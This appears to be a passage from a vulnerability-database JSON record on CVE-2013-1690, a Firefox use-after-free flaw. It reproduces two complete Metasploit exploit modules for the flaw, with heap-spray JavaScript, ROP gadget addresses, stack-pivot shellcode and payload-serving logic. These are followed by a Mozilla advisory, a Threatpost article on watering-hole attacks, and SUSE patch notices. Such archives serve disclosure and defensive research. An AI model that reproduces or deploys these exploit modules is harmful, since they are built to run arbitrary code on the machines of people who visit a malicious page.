#{request.uri} requested...\") \n \nif request.uri =~ /iframe\\.html/ \nprint_status(\"Sending iframe HTML\") \nsend_response(cli, iframe, {'Content-Type'=>'text/html'}) \nreturn \nend \n \nprint_status(\"Sending HTML\") \nsend_response(cli, content, {'Content-Type'=>'text/html'}) \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122750/mozilla_firefox_onreadystatechange.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-03T05:54:47", "description": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free. CVE-2013-1690. Remote exploit for windows platform", "published": "2013-08-08T00:00:00", "type": "exploitdb", "title": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1690"], "modified": "2013-08-08T00:00:00", "id": "EDB-ID:27429", "href": "https://www.exploit-db.com/exploits/27429/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Firefox onreadystatechange Event DocumentViewerImpl Use After Free',\r\n 'Description' => %q{\r\n This module exploits a vulnerability found on Firefox 17.0.6, specifically an use\r\n after free of a DocumentViewerImpl object, triggered via an specially crafted web\r\n page using onreadystatechange events and the window.stop() API, as exploited in the\r\n wild on 2013 August to target Tor Browser users.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Nils', # vulnerability discovery\r\n 'Unknown', # 1day exploit, prolly the FBI\r\n 'w3bd3vil', # 1day analysis\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1690' ],\r\n [ 'OSVDB', '94584'],\r\n [ 'BID', '60778'],\r\n [ 'URL', 'https://www.mozilla.org/security/announce/2013/mfsa2013-53.html' ],\r\n [ 'URL', 'https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html' ],\r\n [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=901365' ],\r\n [ 'URL', 'http://krash.in/ffn0day.txt' ],\r\n [ 'URL', 'http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Firefox 17 & Firefox 21 / Windows XP SP3',\r\n {\r\n 'FakeObject' => 0x0c101008, # Pointer to the Sprayed Memory\r\n 'RetGadget' => 0x77c3ee16, # ret from msvcrt\r\n 'StackPivot' => 0x76C9B4C2, # xcht ecx,esp # or byte ptr[eax], al # add byte ptr [edi+5Eh], bl # ret 8 from IMAGEHLP\r\n 'VFuncPtr' => 0x0c10100c # Fake Function Pointer to the Sprayed Memory\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => 'Jun 25 2013',\r\n 'DefaultTarget' => 0))\r\n\r\n end\r\n\r\n def stack_pivot\r\n pivot = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\r\n pivot << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\r\n pivot << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\r\n pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\r\n return pivot\r\n end\r\n\r\n def junk(n=4)\r\n return rand_text_alpha(n).unpack(\"V\").first\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n vprint_status(\"Agent: #{agent}\")\r\n\r\n if agent !~ /Windows NT 5\\.1/\r\n print_error(\"Windows XP not found, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n if agent !~ /Firefox\\/17/ or agent !~ /Firefox\\/21/\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n my_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource\r\n\r\n # build html\r\n code = [\r\n target['VFuncPtr'],\r\n target['RetGadget'],\r\n target['StackPivot'],\r\n junk\r\n ].pack(\"V*\")\r\n code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})\r\n js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))\r\n js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch))\r\n\r\n content = <<-HTML\r\n<html>\r\n<body>\r\n<iframe src=\"#{my_uri}/iframe.html\"></iframe>\r\n</body></html>\r\n HTML\r\n\r\n # build iframe\r\n iframe = <<-IFRAME\r\n<script>\r\nvar z=\"<body><img src='nonexistant.html' onerror=\\\\\"\\\\\" ></body>\";\r\nvar test = new Array();\r\nvar heap_chunks;\r\nfunction heapSpray(shellcode, fillsled) {\r\n var chunk_size, headersize, fillsled_len, code;\r\n var i, codewithnum;\r\n chunk_size = 0x40000;\r\n headersize = 0x10;\r\n fillsled_len = chunk_size - (headersize + shellcode.length);\r\n while (fillsled.length <fillsled_len)\r\n fillsled += fillsled;\r\n fillsled = fillsled.substring(0, fillsled_len);\r\n code = shellcode + fillsled;\r\n heap_chunks = new Array();\r\n for (i = 0; i<1000; i++)\r\n {\r\n codewithnum = \"HERE\" + code;\r\n heap_chunks[i] = codewithnum.substring(0, codewithnum.length);\r\n }\r\n}\r\n\r\n\r\nfunction b() {\r\n for(var c=0;1024>c;c++) {\r\n test[c]=new ArrayBuffer(180);\r\n bufView = new Uint32Array(test[c]);\r\n for (var i=0; i < 45; i++) {\r\n bufView[i] = #{target['FakeObject']};\r\n }\r\n }\r\n}\r\n\r\nfunction a() {\r\n window.stop();\r\n var myshellcode = unescape(\"#{js_code}\");\r\n var myfillsled = unescape(\"#{js_random}\");\r\n heapSpray(myshellcode,myfillsled);\r\n b();\r\n window.parent.frames[0].frameElement.ownerDocument.write(z);\r\n}\r\n\r\ndocument.addEventListener(\"readystatechange\",a,null);\r\n</script>\r\n IFRAME\r\n\r\n print_status(\"URI #{request.uri} requested...\")\r\n\r\n if request.uri =~ /iframe\\.html/\r\n print_status(\"Sending iframe HTML\")\r\n send_response(cli, iframe, {'Content-Type'=>'text/html'})\r\n return\r\n end\r\n\r\n print_status(\"Sending HTML\")\r\n send_response(cli, content, {'Content-Type'=>'text/html'})\r\n\r\n end\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/27429/"}], "metasploit": [{"lastseen": "2020-10-12T22:42:24", "description": "This module exploits a vulnerability found on Firefox 17.0.6, specifically a use after free of a DocumentViewerImpl object, triggered via a specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild on 2013 August to target Tor Browser users.\n", "published": "2013-08-07T20:36:54", "type": "metasploit", "title": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1690"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MOZILLA_FIREFOX_ONREADYSTATECHANGE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Firefox onreadystatechange Event DocumentViewerImpl Use After Free',\n 'Description' => %q{\n This module exploits a vulnerability found on Firefox 17.0.6, specifically a use\n after free of a DocumentViewerImpl object, triggered via a specially crafted web\n page using onreadystatechange events and the window.stop() API, as exploited in the\n wild on 2013 August to target Tor Browser users.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Nils', # vulnerability discovery\n 'Unknown', # 1day exploit, prolly the FBI\n 'w3bd3vil', # 1day analysis\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1690' ],\n [ 'OSVDB', '94584'],\n [ 'BID', '60778'],\n [ 'URL', 'https://www.mozilla.org/security/announce/2013/mfsa2013-53.html' ],\n [ 'URL', 'https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html' ],\n [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=901365' ],\n [ 'URL', 'http://krash.in/ffn0day.txt' ],\n [ 'URL', 'http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Firefox 17 & Firefox 21 / Windows XP SP3',\n {\n 'FakeObject' => 0x0c101008, # Pointer to the Sprayed Memory\n 'RetGadget' => 0x77c3ee16, # ret from msvcrt\n 'StackPivot' => 0x76C9B4C2, # xcht ecx,esp # or byte ptr[eax], al # add byte ptr [edi+5Eh], bl # ret 8 from IMAGEHLP\n 'VFuncPtr' => 0x0c10100c # Fake Function Pointer to the Sprayed Memory\n }\n ]\n ],\n 'DisclosureDate' => '2013-06-25',\n 'DefaultTarget' => 0))\n\n end\n\n def stack_pivot\n pivot = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\n pivot << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\n pivot << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\n pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\n return pivot\n end\n\n def junk(n=4)\n return rand_text_alpha(n).unpack(\"V\").first\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n vprint_status(\"Agent: #{agent}\")\n\n if agent !~ /Windows NT 5\\.1/\n print_error(\"Windows XP not found, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n unless agent =~ /Firefox\\/(17|21)/\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n my_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource\n\n # build html\n code = [\n target['VFuncPtr'],\n target['RetGadget'],\n target['StackPivot'],\n junk\n ].pack(\"V*\")\n code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})\n js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))\n js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch))\n\n content = <<-HTML\n<html>\n<body>\n<iframe src=\"#{my_uri}/iframe.html\"></iframe>\n</body></html>\n HTML\n\n # build iframe\n iframe = <<-IFRAME\n<script>\nvar z=\"<body><img src='nonexistant.html' onerror=\\\\\"\\\\\" ></body>\";\nvar test = new Array();\nvar heap_chunks;\nfunction heapSpray(shellcode, fillsled) {\n var chunk_size, headersize, fillsled_len, code;\n var i, codewithnum;\n chunk_size = 0x40000;\n headersize = 0x10;\n fillsled_len = chunk_size - (headersize + shellcode.length);\n while (fillsled.length <fillsled_len)\n fillsled += fillsled;\n fillsled = fillsled.substring(0, fillsled_len);\n code = shellcode + fillsled;\n heap_chunks = new Array();\n for (i = 0; i<1000; i++)\n {\n codewithnum = \"HERE\" + code;\n heap_chunks[i] = codewithnum.substring(0, codewithnum.length);\n }\n}\n\n\nfunction b() {\n for(var c=0;1024>c;c++) {\n test[c]=new ArrayBuffer(180);\n bufView = new Uint32Array(test[c]);\n for (var i=0; i < 45; i++) {\n bufView[i] = #{target['FakeObject']};\n }\n }\n}\n\nfunction a() {\n window.stop();\n var myshellcode = unescape(\"#{js_code}\");\n var myfillsled = unescape(\"#{js_random}\");\n heapSpray(myshellcode,myfillsled);\n b();\n window.parent.frames[0].frameElement.ownerDocument.write(z);\n}\n\ndocument.addEventListener(\"readystatechange\",a,null);\n</script>\n IFRAME\n\n print_status(\"URI #{request.uri} requested...\")\n\n if request.uri =~ /iframe\\.html/\n print_status(\"Sending iframe HTML\")\n send_response(cli, iframe, {'Content-Type'=>'text/html'})\n return\n end\n\n print_status(\"Sending HTML\")\n send_response(cli, content, {'Content-Type'=>'text/html'})\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb"}], "mozilla": [{"lastseen": "2016-09-05T13:37:40", "bulletinFamily": "software", "cvelist": ["CVE-2013-1690"], "edition": 1, "description": "Security researcher Nils reported that specially crafted web\ncontent using the onreadystatechange event and reloading of pages\ncould sometimes cause a crash when unmapped memory is executed. This crash is\npotentially exploitable.\nIn general these flaws cannot be exploited through email in the\nThunderbird and SeaMonkey products because scripting is disabled, but are\npotentially a risk in browser or browser-like contexts in those products.", "modified": "2013-06-25T00:00:00", "published": "2013-06-25T00:00:00", "id": "MFSA2013-53", "href": "http://www.mozilla.org/en-US/security/advisories/mfsa2013-53/", "type": "mozilla", "title": "Execution of unmapped memory through onreadystatechange event", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:41:44", "description": "CVE(CAN) ID: CVE-2013-1690\r\n\r\nFirefox\u662f\u4e00\u6b3e\u975e\u5e38\u6d41\u884c\u7684\u5f00\u6e90WEB\u6d4f\u89c8\u5668\r\n\r\nMozilla Firefox 22.0\u4e4b\u524d\u7248\u672c, Firefox ESR 17.x, Thunderbird 17.0.7\u4e4b\u524d\u7248\u672c, Thunderbird ESR 17.x\u5728\u52a0\u8f7d\u67d0\u4e9b\u9875\u9762\u65f6\uff0c\u6ca1\u6709\u6b63\u786e\u5904\u7406onreadystatechange\u4e8b\u4ef6\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u7279\u5236\u7684\u7f51\u7ad9\u89e6\u53d1\u6267\u884c\u672a\u6620\u5c04\u5185\u5b58\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u9020\u6210\u62d2\u7edd\u670d\u52a1\u6216\u6267\u884c\u4efb\u610f\u4ee3\u7801\r\n0\r\nMozilla Firefox ESR 17.x\r\nMozilla Firefox <= 22.0\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMozilla\r\n-------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.mozilla.org/security/", "published": "2013-08-11T00:00:00", "title": "Mozilla Firefox JavaScript\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1690"], "modified": "2013-08-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60948", "id": "SSV:60948", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "threatpost": [{"lastseen": "2018-10-06T23:00:05", "bulletinFamily": "info", "cvelist": ["CVE-2012-1723", "CVE-2013-1347", "CVE-2013-1690"], "description": "A string of watering hole attacks targeting oil and energy companies dating back to May could be linked to similar[ attacks against the U.S. Department of Labor website](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/100081>).\n\nResearchers at Cisco discovered the [compromised domains of 10 oil and energy companies](<http://blogs.cisco.com/security/watering-hole-attacks-target-energy-sector/>) worldwide, including hydroelectric plants, natural gas distributors, industrial suppliers to the energy sector and investment firms serving those markets. Six of the 10 sites shared the same Web design firm and three of the six are owned by the same parent company. Cisco researcher Emmanuel Tacheau speculates that credentials at the Web design firm were stolen, leading to the compromises.\n\nThe 10 sites were exploited and serving iframe redirects to other sites hosting espionage malware, possibly the [Poison Ivy remote access Trojan](<http://threatpost.com/poison-ivy-rat-spotted-in-three-new-attacks/102022>).\n\n\u201cThe assumption is, with the target companies being in the energy sector, they were attempting to infect machines within that sector and exfiltrate intellectual property,\u201d Tacheau said.\n\nThe iframes load exploit code and malware from three compromised domains\u2014keeleux[.]com, kenzhebek[.], and nahoonservices[.]com. The exploits target primarily a Java vulnerability, [CVE-2012-1723](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1723>), or a flaw in Internet Explorer 8, [CVE-2013-1347](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347>). A Firefox exploit was also found in these attacks, [CVE-2013-1690](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1690>).\n\nCisco said the malware used in the attacks is a Trojan that captures system configurations, as well as clipboard and keyboard data. It also establishes an encrypted connection to a command and control server hosted in Greece awaiting commands. All of the infected sites were notified and most had been cleaned up, Cisco said.\n\n\u201cDetection for the malware was extremely low, so that\u2019s always a concern,\u201d Tacheau said. \u201cFortunately, exploit detection for the exploits used is pretty good, so hopefully people will have been protected.\u201d\n\nWatering hole attacks are effective because they target websites of interest to the intended victim. In the past, government policy resource websites and mobile developer forums have been compromised in other watering hole attacks.\n\nAt the time of the Department of Labor attacks, also in May, the [IE 8 exploit was a zero-day ](<http://threatpost.com/ie-8-zero-day-found-as-dol-watering-hole-attack-spreads-to-nine-other-sites/100212>)and had infected the DOL\u2019s Site Exposure Matrices (SEM) website with javascript redirecting victims to the Poison Ivy RAT. The SEM website is a repository of data on toxic substances found at facilities run by the Department of Energy. At the time, security experts speculated the attackers were targeting DOE employees working on nuclear weapons programs.\n\nThe [IE vulnerability was patched in May](<http://threatpost.com/microsoft-patches-department-of-labor-pwn2own-ie-vulnerabilities/100633>), but not before those [attacks spread to nine other sites including the US Agency for International Development (USAID)](<http://threatpost.com/usaid-workers-also-targeted-by-dol-watering-hole-attackers/100528>) and research firms in Asia.\n\nGiven the timing of the two attacks and the use of the same Internet Explorer exploit, the Department of Labor attacks could be tied to the energy and oil attacks as well.\n\n\u201cThat\u2019s the million dollar question,\u201d Tacheau said. \u201cThere certainly are a lot of commonalities. If you combine the timing, the shared exploit and the sector targeted, it does seem at least suspiciously in favor of a semblance of attackers.\u201d\n\nThe oil and energy attacks, however, were found coincidentally by Cisco researchers looking at system logs and noticing the commonalities in the sectors targeted.\n\n\u201cIt boils down to a matter of volume,\u201d Tacheau said. \u201cThese were low volume-high stakes attacks; these sites don\u2019t attract a large number of visitors. The DOL attacks were different. When you have a high profile site like that, those are always going to be spotted off the bat.\u201d\n\n[_Image courtesy KenHodge13 Flickr_](<http://www.flickr.com/photos/40132991@N07/>)\n", "modified": "2013-09-24T19:10:09", "published": "2013-09-19T15:55:05", "id": "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB", "href": "https://threatpost.com/oil-energy-watering-hole-attacks-could-be-tied-to-dol-attacks/102366/", "type": "threatpost", "title": "Oil, Energy Watering Hole Attacks Linked to DOL attack", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:31:56", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "Mozilla Firefox has been updated to the 17.0.7 ESR version,\n which fixes bugs and security issues.\n\n *\n\n MFSA 2013-49: Mozilla developers identified and fixed\n several memory safety bugs in the browser engine used in\n Firefox and other Mozilla-based products. Some of these\n bugs showed evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code.\n\n Gary Kwong, Jesse Ruderman, and Andrew McCreight\n reported memory safety problems and crashes that affect\n Firefox ESR 17, and Firefox 21. (CVE-2013-1682)\n\n *\n\n MFSA 2013-50: Security researcher Abhishek Arya\n (Inferno) of the Google Chrome Security Team used the\n Address Sanitizer tool to discover a series of\n use-after-free problems rated critical as security issues\n in shipped software. Some of these issues are potentially\n exploitable, allowing for remote code execution. We would\n also like to thank Abhishek for reporting additional\n use-after-free and buffer overflow flaws in code introduced\n during Firefox development. These were fixed before general\n release.\n\n o Heap-use-after-free in\n mozilla::dom::HTMLMediaElement::LookupMediaElementURITable\n (CVE-2013-1684) o Heap-use-after-free in\n nsIDocument::GetRootElement (CVE-2013-1685) o\n Heap-use-after-free in mozilla::ResetDir (CVE-2013-1686)\n *\n\n MFSA 2013-51 / CVE-2013-1687: Security researcher\n Mariusz Mlynski reported that it is possible to compile a\n user-defined function in the XBL scope of a specific\n element and then trigger an event within this scope to run\n code. In some circumstances, when this code is run, it can\n access content protected by System Only Wrappers (SOW) and\n chrome-privileged pages. This could potentially lead to\n arbitrary code execution. Additionally, Chrome Object\n Wrappers (COW) can be bypassed by web content to access\n privileged methods, leading to a cross-site scripting (XSS)\n attack from privileged pages.\n\n *\n\n MFSA 2013-53 / CVE-2013-1690: Security researcher\n Nils reported that specially crafted web content using the\n onreadystatechange event and reloading of pages could\n sometimes cause a crash when unmapped memory is executed.\n This crash is potentially exploitable.\n\n *\n\n MFSA 2013-54 / CVE-2013-1692: Security researcher\n Johnathan Kuskos reported that Firefox is sending data in\n the body of XMLHttpRequest (XHR) HEAD requests, which goes\n agains the XHR specification. This can potentially be used\n for Cross-Site Request Forgery (CSRF) attacks against sites\n which do not distinguish between HEAD and POST requests.\n\n *\n\n MFSA 2013-55 / CVE-2013-1693: Security researcher\n Paul Stone of Context Information Security discovered that\n timing differences in the processing of SVG format images\n with filters could allow for pixel values to be read. This\n could potentially allow for text values to be read across\n domains, leading to information disclosure.\n\n *\n\n MFSA 2013-59 / CVE-2013-1697: Mozilla security\n researcher moz_bug_r_a4 reported that XrayWrappers can be\n bypassed to call content-defined toString and valueOf\n methods through DefaultValue. This can lead to unexpected\n behavior when privileged code acts on the incorrect values.\n", "edition": 1, "modified": "2013-07-05T22:04:18", "published": "2013-07-05T22:04:18", "id": "SUSE-SU-2013:1153-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00011.html", "type": "suse", "title": "Security update for Mozilla Firefox (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:37:19", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "MozillaThunderbird was updated to Thunderbird 17.0.7\n (bnc#825935)\n\n Security issues fixed:\n * MFSA 2013-49/CVE-2013-1682 Miscellaneous memory safety\n hazards\n * MFSA 2013-50/CVE-2013-1684/CVE-2013-1685/CVE-2013-1686\n Memory corruption found using Address Sanitizer\n * MFSA 2013-51/CVE-2013-1687 (bmo#863933, bmo#866823)\n Privileged content access and execution via XBL\n * MFSA 2013-53/CVE-2013-1690 (bmo#857883) Execution of\n unmapped memory through onreadystatechange event\n * MFSA 2013-54/CVE-2013-1692 (bmo#866915) Data in the\n body of XHR HEAD requests leads to CSRF attacks\n * MFSA 2013-55/CVE-2013-1693 (bmo#711043) SVG filters can\n lead to information disclosure\n * MFSA 2013-56/CVE-2013-1694 (bmo#848535) PreserveWrapper\n has inconsistent behavior\n * MFSA 2013-59/CVE-2013-1697 (bmo#858101) XrayWrappers\n can be bypassed to run user defined methods in a\n privileged context\n\n", "edition": 1, "modified": "2013-07-04T12:04:15", "published": "2013-07-04T12:04:15", "id": "OPENSUSE-SU-2013:1141-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00004.html", "type": "suse", "title": "MozillaThunderbird: 17.0.7 (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:38:53", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "Mozilla xulrunner was update to 17.0.7esr (bnc#825935)\n\n Security issues fixed:\n * MFSA 2013-49/CVE-2013-1682 Miscellaneous memory safety\n hazards\n * MFSA 2013-50/CVE-2013-1684/CVE-2013-1685/CVE-2013-1686\n Memory corruption found using Address Sanitizer\n * MFSA 2013-51/CVE-2013-1687 (bmo#863933, bmo#866823)\n Privileged content access and execution via XBL\n * MFSA 2013-53/CVE-2013-1690 (bmo#857883) Execution of\n unmapped memory through onreadystatechange event\n * MFSA 2013-54/CVE-2013-1692 (bmo#866915) Data in the\n body of XHR HEAD requests leads to CSRF attacks\n * MFSA 2013-55/CVE-2013-1693 (bmo#711043) SVG filters can\n lead to information disclosure\n * MFSA 2013-56/CVE-2013-1694 (bmo#848535) PreserveWrapper\n has inconsistent behavior\n * MFSA 2013-59/CVE-2013-1697 (bmo#858101) XrayWrappers\n can be bypassed to run user defined methods in a\n privileged context\n\n", "edition": 1, "modified": "2013-07-04T12:04:46", "published": "2013-07-04T12:04:46", "id": "OPENSUSE-SU-2013:1143-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00006.html", "type": "suse", "title": "xulrunner: 17.0.7esr (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:23:06", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1696", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1695", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1688", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1683", "CVE-2013-1693"], "description": "update to Firefox 22.0 and Thunderbird 17.0.7 including the\n following security fixes\n * MFSA 2013-49 Miscellaneous memory safety hazards\n * MFSA 2013-50 Memory corruption found using Address\n Sanitizer\n * MFSA 2013-51 Privileged content access and execution via\n XBL\n * MFSA 2013-52 Arbitrary code execution within Profiler\n * MFSA 2013-53 Execution of unmapped memory through\n onreadystatechange event\n * MFSA 2013-54 Data in the body of XHR HEAD requests leads\n to CSRF attacks\n * MFSA 2013-55 SVG filters can lead to information\n disclosure\n * MFSA 2013-56 PreserveWrapper has inconsistent behavior\n * MFSA 2013-57 Sandbox restrictions not applied to nested\n frame elements\n * MFSA 2013-58 X-Frame-Options ignored when using server\n push with multi-part responses\n * MFSA 2013-59 XrayWrappers can be bypassed to run user\n defined methods in a privileged context\n\n", "edition": 1, "modified": "2013-07-04T09:04:31", "published": "2013-07-04T09:04:31", "id": "OPENSUSE-SU-2013:1140-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00003.html", "type": "suse", "title": "regular updates for Mozilla applications (FF/TB) (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:38:48", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1696", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1695", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1688", "CVE-2013-1686", "CVE-2013-1698", "CVE-2013-1682", "CVE-2013-1683", "CVE-2013-1693"], "description": "Seamonkey was updated to version 2.19\n\n * MFSA 2013-49/CVE-2013-1682/CVE-2013-1683 Miscellaneous\n memory safety hazards\n * MFSA 2013-50/CVE-2013-1684/CVE-2013-1685/CVE-2013-1686\n Memory corruption found using Address Sanitizer\n * MFSA 2013-51/CVE-2013-1687 (bmo#863933, bmo#866823)\n Privileged content access and execution via XBL\n * MFSA 2013-52/CVE-2013-1688 (bmo#873966) Arbitrary code\n execution within Profiler\n * MFSA 2013-53/CVE-2013-1690 (bmo#857883) Execution of\n unmapped memory through onreadystatechange event\n * MFSA 2013-54/CVE-2013-1692 (bmo#866915) Data in the\n body of XHR HEAD requests leads to CSRF 